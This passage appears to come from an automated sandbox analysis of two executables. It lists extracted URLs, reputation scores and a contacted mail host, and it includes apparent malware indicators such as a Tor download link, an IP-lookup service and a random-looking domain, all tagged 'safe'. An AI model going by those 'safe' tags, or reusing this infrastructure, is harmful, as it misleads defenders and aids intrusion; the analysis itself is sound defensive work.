                      http://www.jiyu-kobo.co.jp/Y0%URL Reputationsafe
                      http://www.galapagosdesign.com/0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.fontbureau.comF0%URL Reputationsafe
                      http://www.fontbureau.comcomd0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/N0%URL Reputationsafe
                      http://mail.gnvmetalica.pe0%Avira URL Cloudsafe
                      http://www.fontbureau.commom0%Avira URL Cloudsafe
                      http://www.fontbureau.comdc0%Avira URL Cloudsafe
                      http://www.fontbureau.coma=0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.fontbureau.comd0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.fontbureau.coma20%Avira URL Cloudsafe
                      https://pZXqS7KWMFA4rh4s.net$0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/u0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
                      http://www.founder.com.cn/cn90%URL Reputationsafe
                      http://www.fontbureau.comld0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.fontbureau.como0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/%70%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/j0%URL Reputationsafe
                      http://www.fontbureau.comalic0%URL Reputationsafe
                      http://www.fontbureau.comgrita=0%Avira URL Cloudsafe
                      http://www.fontbureau.comitud0%URL Reputationsafe
                      http://www.fontbureau.comFj0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.gnvmetalica.pe
                      		162.241.148.206
                      		truefalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://pZXqS7KWMFA4rh4s.netjNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.825746785.000000000343E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers/frere-jones.htmlh)7anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmpfalse
                          		high
                          http://127.0.0.1:HTTP/1.1anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.fontbureau.com/designersGanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comI.TTFanyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/?anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/frere-jones.html.anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmpfalse
                                  		high
                                  http://www.tiro.comanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.comcoma=anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306908381.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306974365.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.fontbureau.com/designersanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.goodfont.co.kranyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.sajatypeworks.comanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.301360086.0000000005392000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.typography.netDanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/cTheanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.ascendercorp.com/typedesigners.html0anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/2anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp//anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/fi-fjanyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.fontbureau.com/anyname.exe, 00000001.00000003.307705902.0000000005373000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.galapagosdesign.com/DPleaseanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/Y0anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/jp/Nanyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304935196.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305193401.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304993341.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305244460.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305125471.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305058733.0000000005393000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://api.ipify.org%GETMozilla/5.0jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		low
                                      http://www.fontbureau.comrsivanyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fonts.comanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.sandoll.co.kranyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/#anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304620293.0000000005383000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.ipify.org%anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		low
                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipanyname.exe, 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, anyname.exe, 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, anyname.exe, 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://PGwAqe.comjNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com/uanyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306125466.0000000005380000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cndanyname.exe, 00000001.00000003.302877241.0000000005372000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/Yanyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.apache.org/licenses/LICENSE-2.0anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303350130.0000000005389000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.comanyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/anyname.exe, 00000001.00000003.308329187.000000000537D000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://DynDns.comDynDNSjNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comFanyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.comcomdanyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haanyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/Nanyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://mail.gnvmetalica.peanyname.exe, 00000006.00000002.825426440.0000000003138000.00000004.00000001.sdmp, anyname.exe, 00000006.00000002.825518834.000000000315A000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.826045034.0000000003461000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.825746785.000000000343E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.commomanyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.comdcanyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307705902.0000000005373000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306908381.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306974365.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.fontbureau.coma=anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.fontbureau.com/designers/cabarga.htmleanyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/jp/anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comdanyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comlanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.coma2anyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers/cabarga.htmlNanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://pZXqS7KWMFA4rh4s.net$jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.founder.com.cn/cnanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/frere-jones.htmlanyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/uanyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlanyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmpfalse
                                                      		high
